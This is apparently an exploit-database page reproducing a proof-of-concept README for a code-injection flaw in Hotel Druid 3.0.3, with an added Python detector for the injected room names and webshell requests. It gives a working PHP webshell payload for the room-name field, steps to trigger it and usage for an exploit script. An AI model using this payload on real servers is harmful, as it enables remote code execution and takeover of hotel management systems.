Related vulnerability
Description
Hotel Druid 3.0.3 Code Injection to Remote Code Execution
Introduction
# CVE-2022-22909
## Description
A Code Injection vulnerability has been found in the `Hotel Druid v3.0.3` application, which an attacker could exploit to execute code remotely on the server.
**For successful exploitation, the attacker must have the privilege to add a new room.**
## Vulnerability description
The vulnerability occurs because room names are written verbatim into a PHP file, `/dati/selectappartamenti.php`, inside a **double-quoted** string. PHP interpolates variables and `{$...}` expressions inside double-quoted strings, so a room name containing such a sequence is evaluated as code every time the file is loaded.
```php
<?php
echo "
<option value=\"Room1\">Room1</option>
<option value=\"Room2\">Room2</option>
<option value=\"Room3\">Room3</option>
";
?>
```
## Payload
To perform a successful exploitation, add a room with the following payload as the room name.
```php
{${system($_REQUEST[cmd])}}
```
After adding the new room, request `/dati/selectappartamenti.php` and trigger the webshell by passing a command in the `cmd` parameter.
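As an added defender-side example (not part of the original PoC or of Hotel Druid's code), the following Python checks cover the two places this issue surfaces: the generated `selectappartamenti.php` is scanned for room names carrying a PHP `{$` interpolation sequence, and web-server access logs are searched for requests to that file that carry a `cmd` parameter. The combined-log format and all sample data are constructed assumptions.

```python
import re
from urllib.parse import parse_qs, urlsplit

# File that Hotel Druid generates from room names (path taken from the advisory).
VULN_PATH = "/dati/selectappartamenti.php"

# Inside a double-quoted PHP string, "{$" starts complex interpolation; a room
# name containing it is executed as PHP when the generated file is loaded.
INTERPOLATION_RE = re.compile(r"\{\$")

# Room names appear as <option value=\"NAME\"> inside the generated echo string.
OPTION_RE = re.compile(r'<option value=\\"(.*?)\\">')

# Assumed Apache/nginx combined log format (constructed for this example).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) \S+" (?P<status>\d{3})'
)


def suspicious_room_names(php_source):
    """Return room names from the generated file that contain a PHP interpolation
    sequence, i.e. names that would run as code instead of being displayed."""
    names = OPTION_RE.findall(php_source)
    return [name for name in names if INTERPOLATION_RE.search(name)]


def flag_webshell_requests(log_lines):
    """Return (client_ip, url) for requests to the generated file whose query
    string carries a cmd parameter. $_REQUEST also accepts POST bodies, so this
    only covers the GET form visible in standard access logs."""
    hits = []
    for line in log_lines:
        match = LOG_RE.match(line)
        if not match:
            continue  # skip lines that are not in the assumed format
        parts = urlsplit(match.group("url"))
        if parts.path.endswith(VULN_PATH) and "cmd" in parse_qs(parts.query):
            hits.append((match.group("ip"), match.group("url")))
    return hits


# Constructed sample of the generated file, using the payload shown above.
SAMPLE_PHP = r'''<?php
echo "
<option value=\"Room1\">Room1</option>
<option value=\"{${system($_REQUEST[cmd])}}\">{${system($_REQUEST[cmd])}}</option>
";
?>'''

# Constructed access-log lines (documentation IP ranges).
SAMPLE_LOG = [
    '203.0.113.7 - - [17/Feb/2022:23:09:35 +0000] "GET /hoteldruid/dati/selectappartamenti.php?cmd=id HTTP/1.1" 200 512',
    '198.51.100.2 - - [17/Feb/2022:23:10:01 +0000] "GET /hoteldruid/dati/selectappartamenti.php HTTP/1.1" 200 512',
    '198.51.100.2 - - [17/Feb/2022:23:11:14 +0000] "GET /hoteldruid/index.php HTTP/1.1" 200 4096',
]

if __name__ == "__main__":
    print("injected room names:", suspicious_room_names(SAMPLE_PHP))
    print("webshell requests:", flag_webshell_requests(SAMPLE_LOG))
```

Both checks are post-hoc: the fix itself is to stop emitting user-controlled names into executable PHP, for example by storing them with `var_export()` or in a non-PHP data file and reading them at runtime.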
## Usage
```
usage: hotel-druid.py [-h] -t TARGET [-u USERNAME] [-p PASSWORD] [--noauth]

optional arguments:
  -h, --help            show this help message and exit

required arguments:
  -t TARGET, --target TARGET
                        Target URL. Example : http://10.20.30.40/path/to/hoteldruid
  -u USERNAME, --username USERNAME
                        Username
  -p PASSWORD, --password PASSWORD
                        password
  --noauth              If No authentication is required to access the dashboard
```
## Example
If the application has no authentication, use the `--noauth` flag to skip the login step.

If the server has authentication enabled, use `--username` and `--password` to authenticate.

## Credits
Researcher and POC writer - [0z09e](http://twitter.com/0z09e)
***
File snapshot
[4.0K] /data/pocs/a015b18c866e525dd18490231b6c8f9a25a124c4
├── [5.7K] exploit.py
├── [4.0K] img
│ ├── [ 51K] Pasted image 20220217230935.png
│ ├── [ 52K] Pasted image 20220217231404.png
│ └── [ 18K] Pasted image 20220217232112.png
├── [ 34K] LICENSE
└── [1.8K] README.md
1 directory, 6 files
Notes
1. It is recommended to access the PoC through its original source first.
2. If the source is no longer available or cannot be accessed, send an e-mail to f.jinxu#gmail.com to request the local snapshot (replace # with @).
3. Shenlong has taken a snapshot of the POC code for you; to support long-term maintenance, please consider paying for the local POC. Thank you for your support.